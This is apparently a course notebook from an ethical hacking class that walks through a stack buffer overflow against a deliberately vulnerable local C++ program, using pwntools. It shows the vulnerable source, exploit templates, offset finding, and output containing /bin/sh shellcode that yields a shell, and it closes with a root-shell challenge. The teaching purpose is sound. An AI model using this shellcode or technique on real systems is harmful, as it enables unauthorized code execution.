# Python exploit code

- Python is a popular language among security professionals
- there are a lot of third-party libraries, frameworks and software created for security-related tasks (CTF, pen-testing, vulnerabiliy scanning, etc.) using Python
- we'll use pwntools library - [https://github.com/Gallopsled/pwntools#readme](https://github.com/Gallopsled/pwntools#readme) for generating the exploit code template and exploiting our vulnerable target program
- make sure pwntools is installed on your system
- be familiar with the basics of pwntools framework using this notebook - [Pwntools Tutorials](./PwntoolsTutorials.ipynb)
- we'll exploit `so_stdio.cpp` program in `demos/stack_overflow` folder

In [1]:
! cat ./demos/stack_overflow/so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

In [2]:
%%bash
# compile the target program
input="./demos/stack_overflow/so_stdio.cpp"
output="so_stdio.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [3]:
! python -c 'print("Hello World")' | ./so_stdio.exe

buffer is at 0xffffc2d0
Give me some text: Acknowledged: Hello World with length 11
Good bye!


- armed with this knowledge, let's see how to create a template and complete the exploit code using **pwntools**
- the goal is to force the target program to execute **give_shell()**

### Force the target program to execute give_shell( )
- left as an exercise

#### steps provided as hint
1. creae a template
2. find the offset required to overwrite the caller's return address
3. find the address of **give_shell()**
4. send some junk and the controlled address to execute **give_shell()**

## Send payload containing shellcode

- pwntools provides built-in functionalities to create payload with shellcode of choice and send it to the target program locally or remotely

- let's demonstrate the exploition of demos/stack_overflow/so_stdio.cpp with pwntools

In [1]:
! cat demos/stack_overflow/so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

In [1]:
%%bash
input="demos/stack_overflow/so_stdio.cpp"
output="demos/stack_overflow/so_stdio.exe"
echo kali | sudo -S ./compile.sh $input $output
ls -al $output

-rwxr-xr-x 1 root root 33672 Apr 10 20:28 demos/stack_overflow/so_stdio.exe


[sudo] password for kali: 

- let's play with the program to learn what it does and how it works...

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ cd demos/stack_overflow 

┌──(kali㉿K)-[~/EthicalHacking/demos/stack_overflow]
└─$ ./so_stdio.exe
buffer is at 0xffffc320
Give me some text: read this?
Acknowledged: read this? with length 10
Good bye!

```

- we can now create an exploit code template using **pwn** and update it as necessary; let's create the template for local exploit (no remote code will be included!)

```bash

┌──(kali㉿K)-[~/EthicalHacking/demos/stack_overflow]
└─$ pwn template ./so_stdio.exe > so_stdio_exploit.py  

```

- the template looks like the following to start with

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./so_stdio.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

io.interactive()
```

- find the offset using pwntools cyclic and cyclic_find API
- Python script: demos/stack_overflow/find_offset.py does this for us
- base address of buffer is conviniently printed for us; we can parse it in exploit code
- we'll use the binary shellcode we've genereated from PEDA found in `shellcode/x-86-linux-sh.py` file
- the final exploit code looks like the following

In [2]:
! cat demos/stack_overflow/so_stdio_exploit.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe
from pwn import *

# Set up pwntools for the correct architecture
target_program = './so_stdio.exe'
exe = context.binary = ELF(target_program)

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========

- next is to just run the so_stdio_exploit.py from terminal where the target program and the exploit code reside
- we'll get a shell!

```bash
┌──(kali㉿)-[~/EthicalHacking/demos/stack_overflow]
└─$ python so_stdio_exploit.py 
[*] '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './so_stdio.exe': pid 19331
[+] Starting local process '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe': pid 19333
[*] Process '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe' stopped with exit code -11 (SIGSEGV) (pid 19333)
[+] Parsing corefile...: Done
[*] '/home/kali/EthicalHacking/demos/stack_overflow/core.19333'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffc1d0
    Exe:       '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe' (0x8049000)
    Fault:     0x61616161
offset = 144
[+] Starting local process '/home/kali/EthicalHacking/demos/stack_overflow/so_stdio.exe': pid 19336
b'Give me some text: Acknowledged: \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901\xc0Ph//shh/bin\x89\xe31\xc9\x89\xcaj\x0bX\xcd\x80@\xc1\xff\xff@\xc1\xff\xff@\xc1\xff\xff@\xc1\xff\xff@\xc1\xff\xff with length 144\n'
[*] Switching to interactive mode
$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ date
Sat Dec 19 11:43:44 MST 2020
$ exit
```

## Automatically determining buffer address
- in real world, buffer address will not be printed!
- one can determine the buffer address using ESP
- PEDA provides offset for ESP which is the payload length to completely overwrite EIP or return address
- the ffset to ESP can be automatically determined using cylic_find 
- let's look at the modified program where the line printing the buffer address is commented out
- also the BUFSIZE is changed to 200

In [9]:
! cat demos/stack_overflow/so_stdio_no_add.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 200

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    //printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(std

### Compile the program

In [10]:
%%bash
# compile the target program
input="./demos/stack_overflow/so_stdio_no_add.cpp"
output="./demos/stack_overflow/so_stdio_no_add.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

## Generate and run the exploit code

In [8]:
! cat ./demos/stack_overflow/so_stdio_no_add_exploit.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe
from pwn import *

# Set up pwntools for the correct architecture
target_program = './so_stdio_no_add.exe'
exe = context.binary = ELF(target_program)

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#====

- execute the exploitcode from a terminal and get the shell!

```bash
──(kali㉿K)-[~/Sp22/SystemSecurity/demos/stack_overflow]
└─$ python so_stdio_no_add_exploit.py
[*] '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe': pid 739836
[*] Process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe' stopped with exit code -11 (SIGSEGV) (pid 739836)
[+] Parsing corefile...: Done
[*] '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/core.739836'
    Arch:      i386-32-little
    EIP:       0x63616164
    ESP:       0xffffc280
    Exe:       '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe' (0x8048000)
    Fault:     0x63616164
payload_len = 216
ESP is at ffffc280
EIP contains 63616164
[+] Starting local process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe': pid 739839
buffer address is at: ffffc1a8
[*] Switching to interactive mode
Give me some text: Acknowledged: \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901\xc0Ph//shh/bin\x89\xe31\xc9\x89\xcaj\x0b\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff with length 216
$ whoami
kali
$ exit
[*] Got EOF while reading in interactive
$ 
```

## Challenge

1. Create Python exploit code to get a root shell (instead of the user shell)
    - just modify the above Python demo
    - test to make sure the exploit code works
